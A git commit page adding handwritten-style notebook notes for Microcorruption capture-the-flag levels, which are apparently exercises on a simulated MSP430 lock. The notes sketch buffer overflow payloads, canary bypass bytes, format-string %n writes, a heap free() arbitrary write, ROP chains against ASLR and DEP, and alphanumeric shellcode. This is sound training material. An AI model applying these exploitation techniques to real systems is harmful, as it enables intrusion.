j/MicroCorruption
1
0
Fork 0
mirror of https://git.soft.fish/val/MicroCorruption.git synced 2024-11-21 20:05:58 +00:00
Code Issues Packages Projects Releases Wiki Activity

notes.md: Add book notes for Montevideo through Lagos

Browse Source
This commit is contained in:
Val 2023-03-15 20:13:34 -05:00
parent 5e23a963ec
commit 95e7776c8a
10 changed files with 368 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

26
10-Santa Cruz/notes.md Normal file
View File

@ -0,0 +1,26 @@
`Taken verbatim from my notebook`
# Page 1
```
Santa Cruz
2 buffers
username [0x63] -> 2404 -> 43a2
password [0x63] -> 2404 -> 43b5
r4: return addr: 43cc
Min len stored at 43b3
username +0x11 index 17
Max len stored at 43b4
username +0x12 index 18
43c6 must be 00
-> password must be 16 chars
so strcpy places 00 there
-> password: "passwordpassword"
username[0x11] = 01
username[0x12] = 7f
username[0x42+]= 4a44
Don't put important constants on the stack?
Strcpy does copy the last null byte
A program
```

30
11-Jakarta/notes.md Normal file
View File

@ -0,0 +1,30 @@
`Taken verbatim from my notebook`
# Page 1
```
Jakarta
Acquires 0xff username bytes
-> 3ff2
Acquires 0x1f - uname_len password bytes
(1f - uname_len) & 0x1ff
uname_len = 0x20? 0x21?
=> passwd_len = 0x1ff
-> concatenated to username?
Return value at 401c
= [username][password][...]
before strcpy:
username -> 2402
password -> 2402
concat happens in stack buffer
Length check happens Byte
0120 ~= 0x20 <= 0x21
u_len = (20 or 21)
p_len = (e0 -> 100)
Password
AA [r11] [ret] [fakeret] [args] [AA...AA]
Lesson: Sometimes things are not the data type you think they are
```
`// TODO: What does this mean??`

24
12-Addis Ababa/notes.md Normal file
View File

@ -0,0 +1,24 @@
`Taken verbatim from my notebook`
# Page 1
```
Addis Ababa
format string vulns? (manual hint)
%n: store # chars printed into stack vaf
? where ?
-> 2 prev characters??
30e0: flag location
lE: e0 30
30e0: \0\0 n a m e : p a s s\0
argv [ 1 ][ 2 ][ 3 ][ 4 ][ 5 ][ 6 ]
addr A %n
e0 30 %n %n
DEL 0 %n %n
```
Editor's note:
```
e030 256e 256e
```

14
13-Novosibirsk/notes.md Normal file
View File

@ -0,0 +1,14 @@
`Taken verbatim from my notebook`
# Page 1
```
Novosibirsk
Gets 1f4 characters
Actually allocates proper buffer
44c8: interrupt #
would be nice to set this to 7f
Hypothesis:
"[addr]['A';0x7d]%n"
c844 4141... 25be
Hole in one!

31
14-Algiers/notes.md Normal file
View File

@ -0,0 +1,31 @@
`Taken verbatim from my notebook`
# Page 1
```
Algiers d.01
"LockIT Pro Account Manager"
Tentative TODO:
Authorizer? How to auth user
Interfaces with HSM1
I can overflow heap objects
uname&pass 0x30 long
>0x10 overflows
Can I craft a fake heap object?
username -> overwrite pass blk header?
password -> ???
Hypothesis: arb write in free()
Username
passwordpassword[addr]
"d E "?
4398:
0000 4044 0000 .... Unguarded
in free: free() is arb
r15 = &this_block write~!
r14 = &prev_block
r13 = {size:15,final:1}
r12 = {prev_size:5,final:1}
if prev is final:
skip last-block steps
else last-block steps
```

61
15-Vladivostok/notes.md Normal file
View File

@ -0,0 +1,61 @@
`Taken verbatim from my notebook`
# Page 1
```
Vladivostok ASLR bypass?
username[8]: 0x242b
password[ ]
aslr_base = r11
aslr_address = normal - 0x4000 + aslr_base
Have to call 0x10 directly?
INT 7f:
Takes no arguments (THE LESSON WAS)
7f passed in SR (ROP CHAINING)
All calls to INT wrapped in (+ASLR BYPASS)
push/pop SR?
Neat?
41414141[r10][r11][ret]
FUCKING PRINTF?
Things I have:
printf(username, ...)
buffer overflow on stack
Things I need
Address on stack?
Flow: 1. enter "username"
2. "username" printed
<- Create payload
3. enter "password"
4. buffer overflow
```
# Page 2
```
The Hack (Vladivostok)
Uname payload: "%x%x%x%x"
output %printf
Pword payload: "AAAA(r10)(r11)(pc)[args...]"
Useful locations:
+2aa: pop sr
+2ac: add 8, sp
+2ae: __check_password
+56c: mov.b @sp, r15;
sxt r15 ; pop.b r15
incd sp ;
ret ;
+4f4: swpb r15 ;
mov r15, sr ;
bis #8000, sr ; INT
call 0x10 ;
... ;
ret ;
[popb]7f7f[INT]

23
16-Bangalore/notes.md Normal file
View File

@ -0,0 +1,23 @@
`Taken verbatim from my notebook`
# Page 1
```
Bangalore DEP/NX
Passwords 8-16 chars } 0x20 B limit
Takes 0x30 (48) chars }
Strategy: Construct a ROP chain
to turn page 45 executable
NO STRCPY
mark_page_executable @ 44ba
44ba: sub #6, sp
mov #9100, sr
call #0x10
add #0xa, sp
RET
4458: call 0x10
ROP to set stack executable,
Exec to open the lock
```

129
17-Lagos/notes.md Normal file
View File

@ -0,0 +1,129 @@
`Taken from my notebook, verbatim`
### Page 5
```
LAGOS
45a0: 0b41 -> 3041 "ret"
WE CAN add #4130, sp
~ MOVE THE STACK ~
0: input [0x1bf]=
1: ret -> 4444 (sp+0x60)
2: Move stack to 2400+1c0
3: Ret -> arbitrary address (i.e. 2400+1c2)
4: Execute arbitrary code
```
### Page 1
```
Lagos Alphanumerics Only
`0x200 B -> #2400`
Password valid range: 8-16 c
Valid chars:
[0-9] [A-Z] [a-z]
30-39 41-5a 61-7a
We have enough chars
to overwrite current
function
1b5 bytes before hitting
current instruction
3041 = ret
45a0 = 0b41
at index 1b5
Control of return addr
-> we can ret to string buffer
bypassing sanitizer!
ret to 2400+1bb
25b5
run code from there!
ret at index 0x11
... we need a JMP to get there.
... all our jumps are positive
```
### Page 2
```
D p
4470 looks like a good place
D 0
for code, or 4430
5a37: jge $-14a ?
Arithmetic instructions
Form addresses with sub?
25 b6 bb25
^lsb
55-30 7a-30(ish)
547a + 3030 =
5630 - 307a = 25bb!
V 0 0 z
We can load from our string:
pop r4 = 3441
"4 A "
-> can be any reg from
0-9: 3r41
add.b = 7x5y
3451 = pop & add to r4
3441 3451
pop r4 add r4
```
### Page 3
```
Instructions in range
30: jn
34: jge
38: jl
3c: jmp
4#: mov
5#: add
6#: addc
7#: subc
Feasible addressing modes
10 @Rn Register indirect
11 @Rn+ RI w/ post-inc
Subtract the stack from pc?
3071 subc @sp+, pc
"Large relative jump"
Alignment in 2400 buffer
is not same as in PC
```
### Page 4
```
What is an alphanumeric character?
[0-9] [A-Z] [a-z]
30-39 41-5a 61-7a
Buffers: 43ed: stack buffer
2400: load buffer
43ed + 0x57: 4444
45a0: last byte copied (1b3 bytes)
&[43ed + 1b3] = 0x30, '0'
43ed + 1c0 = payload
Correction: sp at 43ec before
we gain exec
ret will tak sp to 43ee
... we need to create a fake stack
somewhere over in the controllable
zone
The loop only continues if the
FOLLOWING BYTE is valid.
```

14
8-Montevideo/notes.md Normal file
View File

@ -0,0 +1,14 @@
`Taken verbatim from my notebook`
# Page 1
```
Montevideo
strcpy/memset
Allocated 16-byte buffer on stack
Strcpy into it
43ee: start of stack buffer
43fe: return address
454c: INT
['A';16] 4c45 0000 7f
```

16
9-Johannesberg/notes.md Normal file
View File

@ -0,0 +1,16 @@
`Taken verbatim from my notebook`
# Page 1
```
Johannesberg STACK CANARY
Gets 3f bytes
strcpy over stack
...
cmp str[0x11] == c6
if str[0x11] == c6 ; 17th byte is c6
add #0x12, sp
ret
else
halt
['A';16] cb cb 94 45 20 20 7f
```